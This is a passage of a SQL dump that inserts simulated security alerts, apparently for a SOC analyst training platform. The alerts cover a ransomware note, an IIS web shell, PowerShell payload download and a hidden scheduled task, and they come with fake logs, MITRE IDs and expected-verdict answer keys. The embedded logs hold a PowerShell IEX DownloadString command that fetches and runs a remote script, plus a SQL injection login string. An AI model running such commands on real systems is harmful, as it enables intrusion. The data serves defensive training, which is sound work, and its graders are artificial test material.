server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"},{\"timestamp\":\"2026-02-01T20:28:18.958Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:32Z\\\",\\\"event_id\\\":\\\"FIM-20231005-001\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"description\\\":\\\"Suspicious file encryption activity detected on server.\\\",\\\"affected_host\\\":\\\"192.168.1.10\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename_encrypted\\\":\\\"confidential_data.xlsx\\\",\\\"ransomware_name\\\":\\\"CryptoLockerSim\\\",\\\"process_name\\\":\\\"encryptor.exe\\\",\\\"process_id\\\":4567}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" 
| head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(363, 'Ransom Note and Communication', 'critical', 'Incident Response Team', 'A ransom note has appeared on encrypted systems, instructing the company to contact the attackers for decryption keys. The note includes specific communication channels and requests for payment in cryptocurrency. The Incident Response Team is working to find a flaw in the encryption while simulating negotiations with the attackers.', 'Ransomware Note', 'T1486 - Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:45:00Z\",\"event\":\"Ransomware Note Detected\",\"source_ip\":\"192.168.15.45\",\"destination_ip\":\"203.0.113.5\",\"ransom_note_filename\":\"READ_ME.txt\",\"ransom_note_content\":\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\",\"attacker_email\":\"attacker@example.com\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"j.doe\",\"severity\":\"Critical\",\"encryption_algorithm\":\"AES-256\",\"affected_systems\":[\"10.0.0.5\",\"10.0.0.10\"]}', '2026-01-03 00:50:36', '2026-02-18 11:11:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"email reputation service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with ransom demands.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash 
database\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware binary detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename for ransom notes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. 
Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. 
Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(364, 'Suspicious Web Shell Detected on IIS Server', 'high', 'IIS Server Logs', 'A suspicious web shell was detected on a telecommunications provider\'s IIS server. The attacker exploited a web vulnerability to deploy a web shell, gaining initial access.', 'Initial Access', 'T1190', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"server_ip\":\"192.168.1.50\",\"client_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/shell.aspx\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"123456abcdef\",\"filename_uploaded\":\"shell.aspx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"anonymous\"}', '2026-01-03 00:54:31', '2026-02-22 10:33:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous web shell attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File commonly used as a web shell for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a web shell previously identified in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(365, 'Anomalous PowerShell Activity Observed', 'medium', 'PowerShell Logs', 'Unusual PowerShell commands were executed to download additional payloads. This behavior suggests an attempt to leverage legitimate tools for malicious purposes, commonly known as \'living off the land\'.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4104,\"process_id\":1234,\"script_block_id\":\"abc123\",\"user\":\"jdoe\",\"host\":\"DESKTOP-7A89C4K\",\"ip_address\":\"10.0.0.17\",\"command\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\",\"external_ip\":\"203.0.113.45\",\"downloaded_file\":\"malicious.ps1\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-01-03 00:54:31', '2026-02-22 10:36:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.17\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host executing the PowerShell command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repositories\",\"verdict\":\"malicious\",\"details\":\"Script associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious 
payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object 
Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(366, 'Creation of Hidden Scheduled Task', 'medium', 'Task Scheduler Logs', 'To ensure persistent access, Gallium APT creates a covert scheduled task, allowing them to execute scripts at regular intervals.', 'Persistence', 'T1053.005', 1, 'Closed', 177, '{\"EventID\":106,\"Timestamp\":\"2023-10-15T14:22:43Z\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\HiddenTask\",\"Action\":\"Create\",\"User\":\"COMPANY\\\\jdoe\",\"HostIP\":\"192.168.1.45\",\"AttackerIP\":\"203.0.113.54\",\"FilePath\":\"C:\\\\Windows\\\\System32\\\\hidden_task.ps1\",\"MD5Hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-03 00:54:31', '2026-02-22 10:38:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Gallium APT\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious script used by Gallium APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
